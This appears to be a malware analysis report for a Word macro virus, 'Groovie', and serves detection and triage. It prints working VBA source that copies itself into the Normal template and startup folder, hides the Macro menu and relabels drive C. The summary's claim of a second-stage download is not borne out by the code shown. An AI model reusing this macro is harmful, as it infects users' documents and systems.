MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains critical heuristics for VBA macros, including the use of the Shell() function and AutoOpen/Auto_Close macros, indicating malicious intent. The ClamAV detections 'Doc.Trojan.Groovie-2' and 'Doc.Trojan.Groov-1' further confirm its malicious nature. The VBA script, named 'groovie', likely attempts to download and execute a second-stage payload, a common tactic for this type of malware.
Heuristics 7
-
ClamAV: Doc.Trojan.Groovie-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Groovie-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27311 bytes |
SHA-256: 129c46bba9b9cee52320705ced7d283252cbf50cf25361445db7c896f2f55f9f |
|||
|
Detection
ClamAV:
Doc.Trojan.Groov-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CyberHack"
Attribute VB_Name = "CyberForm"
Attribute VB_Base = "0{B61A25EC-3E02-11D3-ADEF-008048EF8E4D}{B61A25E0-3E02-11D3-ADEF-008048EF8E4D}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Unload Me
End Sub
Attribute VB_Name = "groovie"
Public WhoAmI As String
Public DataDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public HoldDoc As String
Public DocThere As Boolean
Public Final_Close_Called As Boolean
Public rn As Variant
Function ID_Status()
On Error Resume Next
If MacroContainer = NormalTemplate Then
WhoAmI = "normal"
GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "data.dot" Then WhoAmI = "orbit"
checkout:
End Function
Function Install_Status()
Dim i As Variant
On Error Resume Next
If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then DataDot = True
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "groovie" Then DocInstalled = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "groovie" Then NormInstalled = True
Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function
Function The_Groovie_Core()
On Error Resume Next
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCodeCore
If WhoAmI = "normal" Then Call NormCodeCore
If WhoAmI = "orbit" Then Call OrbitCoreCode
If NormReadOnly = False Then CommandBars("tools").Controls("Macro").Delete
If NormReadOnly = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
End Function
Function DocCodeCore()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys"
If NormInstalled = False And NormReadOnly = False Then
With NormalTemplate.VBProject
With .VBComponents.Import("c:\groovie.sys")
End With
End With
End If
If DataDot = False Then
ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems
ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc
Shell ("label c: groovie"), 0
Windows(1).Close
End If
End Function
Function NormCodeCore()
On Error Resume Next
Application.ScreenUpdating = False
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
With ActiveDocument.VBProject
With .VBComponents.Import("c:\groovie.sys")
End With
End With
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "ALT-F11 says it's groovie!"
.Execute
End With
End If
If Data
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.